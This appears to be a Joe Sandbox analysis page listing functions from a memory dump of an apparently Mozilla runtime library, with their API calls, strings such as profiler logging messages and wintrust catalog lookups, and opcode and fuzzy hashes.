Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 096f97b6f42beae27080589ecd07beaade90b3257b18e5e2638200b3c4216665
Instruction ID: 380779d6cb49a954ae355d702b04d171ed26f35349c5bf8c8b5231dab53f66a5
Opcode Fuzzy Hash: 096f97b6f42beae27080589ecd07beaade90b3257b18e5e2638200b3c4216665
Instruction Fuzzy Hash: 46014B74601A428BDF0A9FA9D918B2233F5F746758F22052ED90582E40DF74F4248A82

Function 6D58F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
Part of subcall function 6D589420: __Init_thread_footer.LIBCMT ref: 6D58949F

GetCurrentThreadId.KERNEL32 ref: 6D58F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6D58F598), ref: 6D58F621

Part of subcall function 6D5894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6D5894EE
Part of subcall function 6D5894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6D589508

GetCurrentThreadId.KERNEL32 ref: 6D58F637
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8,?,?,00000000,?,6D58F598), ref: 6D58F645
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8,?,?,00000000,?,6D58F598), ref: 6D58F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6D58F62A

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: 80779b67ed643d9f9947b3c24aa56e29b2488d68a20315eec8debaaf3b3e772b
Instruction ID: 0f4396dc0b0c621c63a971ced51ecc8530c362382f8d952d083cbf402eb7f738
Opcode Fuzzy Hash: 80779b67ed643d9f9947b3c24aa56e29b2488d68a20315eec8debaaf3b3e772b
Instruction Fuzzy Hash: 99F05476104614ABDF047BA5C848B6A777DFBCA66DF020419EA0683B53DB764C018B62

Function 6D5805F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6D57CFAE,?,?,?,6D5431A7), ref: 6D5805FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6D57CFAE,?,?,?,6D5431A7), ref: 6D580616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6D5431A7), ref: 6D58061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6D5431A7), ref: 6D580627

Strings

<jemalloc>, xrefs: 6D5805FA, 6D58060F
: (malloc) Error in VirtualFree(), xrefs: 6D58061B, 6D580625

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 8795ca770a2bb469878731cdadbf0a3eb8284beec3dc0e66e18f88fdcb83a1a6
Instruction ID: f0287c1f95eb8e76de389fa80458590488e9a235ccddcf2a9844b746d8d1ad5c
Opcode Fuzzy Hash: 8795ca770a2bb469878731cdadbf0a3eb8284beec3dc0e66e18f88fdcb83a1a6
Instruction Fuzzy Hash: 4DE08CE290501037F618226AAC86EBB761CCBC6174F090039FE0D82301EA5AAD1A51FA

Function 6D5505F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2825e03c39d21ad7dfb39d97446094cf196c8761bebc35ffcdee04e1df4b2224
Instruction ID: 1460316422a1adf073d9a2dcdfa6c98982921ba0988e001b15ef8193f1eb8eb5
Opcode Fuzzy Hash: 2825e03c39d21ad7dfb39d97446094cf196c8761bebc35ffcdee04e1df4b2224
Instruction Fuzzy Hash: 25A158B09056068FDB29CF29C594BAEFBF1BF88304F41896ED44A97B00E730A955CF90

Function 6D59C160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6D59C1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6D59C293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6D59C29E

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: 66d9f3ce3de2ac9d712c353fbe93e64b28853fcb020552ada1f2d9550fabddb8
Instruction ID: 9d66f65b4017683c083d173f1d2df8adfbe2f78377c259da100acc38142e366c
Opcode Fuzzy Hash: 66d9f3ce3de2ac9d712c353fbe93e64b28853fcb020552ada1f2d9550fabddb8
Instruction Fuzzy Hash: E061AD71904659CFCF19CFA8D8806BEBBB5FF49310F194929E842BBA50C731A944CFA0

Function 6D591D00 Relevance: 9.1, APIs: 6, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6D591D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6D591BE3,?,?,6D591D96,00000000), ref: 6D591D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6D591BE3,?,?,6D591D96,00000000), ref: 6D591D4C
GetCurrentThreadId.KERNEL32 ref: 6D591DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6D591DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D591DDA

Part of subcall function 6D591EF0: GetCurrentThreadId.KERNEL32 ref: 6D591F03
Part of subcall function 6D591EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6D591DF2,00000000,00000000), ref: 6D591F0C
Part of subcall function 6D591EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6D591F20

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread
String ID:
API String ID: 135963836-0
Opcode ID: 9196ccd06456beaec6bdd709f6cd72d3960d1f864edc47f14e1306324bde848a
Instruction ID: a4e6a9aa2e7ddb267bcc3959a1166cfc906abd8301390ed3fa41e299dccf8f0c
Opcode Fuzzy Hash: 9196ccd06456beaec6bdd709f6cd72d3960d1f864edc47f14e1306324bde848a
Instruction Fuzzy Hash: 6A4178B5600701AFCB14DF28C488B6ABBF9FB89714F11442EE95A8BB41DB31E854CB91

Function 6D5439A0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6D5CE744,ewZm,00000000,ewZm,?,6D566112), ref: 6D5439AF
LeaveCriticalSection.KERNEL32(6D5CE744,?,6D566112), ref: 6D543A34
EnterCriticalSection.KERNEL32(6D5CE784,6D566112), ref: 6D543A4B
LeaveCriticalSection.KERNEL32(6D5CE784), ref: 6D543A5F

Strings

ewZm, xrefs: 6D5439A3, 6D5439A5
\\m, xrefs: 6D543A02

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: \\m$ewZm
API String ID: 3168844106-1336648597
Opcode ID: aabd40682b2d6fd8bb5fded6ffd9b65aef2a9155654868f9c619a54165b74b25
Instruction ID: f8e3cae9a3bd0a64849cb4d18b3afd63918b974c941fc5d340e80b5c18aa298f
Opcode Fuzzy Hash: aabd40682b2d6fd8bb5fded6ffd9b65aef2a9155654868f9c619a54165b74b25
Instruction Fuzzy Hash: 16210531786A428FDB2DDFA9C446B3A73F5EB86710B26492DD565C3E90DB30AC018B43

Function 6D59C810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6D59C82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6D59C842

Part of subcall function 6D59CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6D5BB5EB,00000000), ref: 6D59CB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6D59C863
std::_Facet_Register.LIBCPMT ref: 6D59C875
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6D59C89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D59C8BC

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: 69bf7d5052e801c937718f8a962eb4592e8a7a14ebfe1a5bd20d8ac960de1d67
Instruction ID: a3ab9386ea52583d1e1ae2049045d6c5898da2b41ad07b8cc7ac055d78804d59
Opcode Fuzzy Hash: 69bf7d5052e801c937718f8a962eb4592e8a7a14ebfe1a5bd20d8ac960de1d67
Instruction Fuzzy Hash: 4411B671A006059BCF04EFA4C899ABE7B74EF89351F01042DE6069B740EB309D04CBA1

Function 6D59D1D0 Relevance: 9.1, APIs: 6, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6D59D1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6D59D1F5
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D59D211
GetCurrentThreadId.KERNEL32 ref: 6D59D217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6D59D226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D59D279

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread
String ID:
API String ID: 135963836-0
Opcode ID: 7c53cab2e5894fd572516d21414ef2942c45b264690fed6e778f4ce303b23391
Instruction ID: 90bf962c1b5da6f285f60cf2a7e70966031e6d0b818942847f476297c7c4d052
Opcode Fuzzy Hash: 7c53cab2e5894fd572516d21414ef2942c45b264690fed6e778f4ce303b23391
Instruction Fuzzy Hash: 62219C31604745DBCF09EF24C488AAEB7B5FF8A324F11452EE51A8B740EB30A845CB96

Function 6D57F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6D57F480

Part of subcall function 6D54F100: LoadLibraryW.KERNEL32(shell32,?,6D5BD020), ref: 6D54F122
Part of subcall function 6D54F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6D54F132

CloseHandle.KERNEL32(00000000), ref: 6D57F555

Part of subcall function 6D5514B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6D551248,6D551248,?), ref: 6D5514C9
Part of subcall function 6D5514B0: memcpy.VCRUNTIME140(?,6D551248,00000000,?,6D551248,?), ref: 6D5514EF

Part of subcall function 6D54EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6D54EEE3

CreateFileW.KERNEL32 ref: 6D57F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6D57F523

Strings

\oleacc.dll, xrefs: 6D57F4CB

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 36a3da4c0eee069af623560010f000f61db9deb784d1da2e8ce9a90ff4885916
Instruction ID: f35244ab19ecb8a2ee3ffc3a2be749d853b390e51417cf8869ddc5c4070991b7
Opcode Fuzzy Hash: 36a3da4c0eee069af623560010f000f61db9deb784d1da2e8ce9a90ff4885916
Instruction Fuzzy Hash: 7A4191305087119FE729DF68C884BABB7F4AF84314F604E1CF69597650EB30D949CB92

Function 6D58E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
Part of subcall function 6D589420: __Init_thread_footer.LIBCMT ref: 6D58949F

GetCurrentThreadId.KERNEL32 ref: 6D58E047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D58E04F

Part of subcall function 6D5894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6D5894EE
Part of subcall function 6D5894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6D589508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D58E09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D58E0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6D58E057

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
Opcode ID: 492252565aaaf747b01c2a9696f20bb660ea8294e0ff722991a124fb6d7f5e2a
Instruction ID: 31cb38d3808eddc72aadbcc904b213446e8169a7c3f1d0b0210b197c2a6a87b4
Opcode Fuzzy Hash: 492252565aaaf747b01c2a9696f20bb660ea8294e0ff722991a124fb6d7f5e2a
Instruction Fuzzy Hash: 0221C574A001699FDF08DF64C858ABEB7B5BF85209F154818E906E7742DB329D05CBA1

Function 6D5A74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6D5A7526
__Init_thread_footer.LIBCMT ref: 6D5A7566
__Init_thread_footer.LIBCMT ref: 6D5A7597

Strings

UnmapViewOfFile2, xrefs: 6D5A7552
kernel32.dll, xrefs: 6D5A7557

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 9aa1c02381c44d9c6c32eff72465470e9bc9c8ad2a8dc889da9481a47549d34f
Instruction ID: 307bc58aeb1d83429c028642a80ab066edc3e087eeeb464a88c45e0ed7c79bbb
Opcode Fuzzy Hash: 9aa1c02381c44d9c6c32eff72465470e9bc9c8ad2a8dc889da9481a47549d34f
Instruction Fuzzy Hash: A721F831B06512EBCE1CDFA8C854F6D37B5EB86761F1A452DE90597E40DF30F8028556

Function 6D5A7930 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6D55BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6D5A7A3F), ref: 6D55BF11
Part of subcall function 6D55BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6D5A7A3F), ref: 6D55BF5D
Part of subcall function 6D55BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6D5A7A3F), ref: 6D55BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6D5A7968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6D5AA264,6D5AA264), ref: 6D5A799A
??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6D5A79E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6D5A79E8

Strings

[m, xrefs: 6D5A79D0

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@
String ID: [m
API String ID: 1915355044-4264648302
Opcode ID: b73e4add29d907c132f3efd6463b8cf1f5030014f2dc81e2fab71b9c7de47304
Instruction ID: e4393fc106ee0418c286e7a1d098e532a6c86cb7f5b284bb0d4de78bf2c9d9ac
Opcode Fuzzy Hash: b73e4add29d907c132f3efd6463b8cf1f5030014f2dc81e2fab71b9c7de47304
Instruction Fuzzy Hash: F0215C756043049FCB18DF18D899A9EBBF5EFC9314F05882DE98A87751DB30A909CB92

Function 6D580170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6D557308), ref: 6D580178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6D580197
FreeLibrary.KERNEL32(?,6D557308), ref: 6D5801AE

Strings

CryptCATCatalogInfoFromContext, xrefs: 6D580191
wintrust.dll, xrefs: 6D580173

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: b1cc893a4c2d513abc2dd4aa8093f3ed410213283a4ace250ad22f8a7c78f6cf
Instruction ID: ba68fa8dcc01e94a268ff847a5b395173f13c4ba0552047217ad887b404abe6c
Opcode Fuzzy Hash: b1cc893a4c2d513abc2dd4aa8093f3ed410213283a4ace250ad22f8a7c78f6cf
Instruction Fuzzy Hash: 99E04F745C2B159BEF146F6AC908B113BF8B70725AF02401FEA8082F51D7B08040CB11

Function 6D580120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6D557297), ref: 6D580128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6D580147
FreeLibrary.KERNEL32(?,6D557297), ref: 6D58015E

Strings

CryptCATAdminEnumCatalogFromHash, xrefs: 6D580141
wintrust.dll, xrefs: 6D580123

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: 74264127fb0445b866c798f274ae9e548e0eb94ae9cbc71db8d8c837fe8388ad
Instruction ID: d949e97a121282f84f4421538070df846239b5b0e5d68f8db1be86c3d7b14593
Opcode Fuzzy Hash: 74264127fb0445b866c798f274ae9e548e0eb94ae9cbc71db8d8c837fe8388ad
Instruction Fuzzy Hash: 3DE09275486A059BEF146F6ADC087267AF8A707B52F02851EAA15C6F51EBB0D0008B66

Function 6D5801C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6D557266), ref: 6D5801C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6D5801E7
FreeLibrary.KERNEL32(?,6D557266), ref: 6D5801FE

Strings

wintrust.dll, xrefs: 6D5801C3
CryptCATAdminReleaseContext, xrefs: 6D5801E1

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
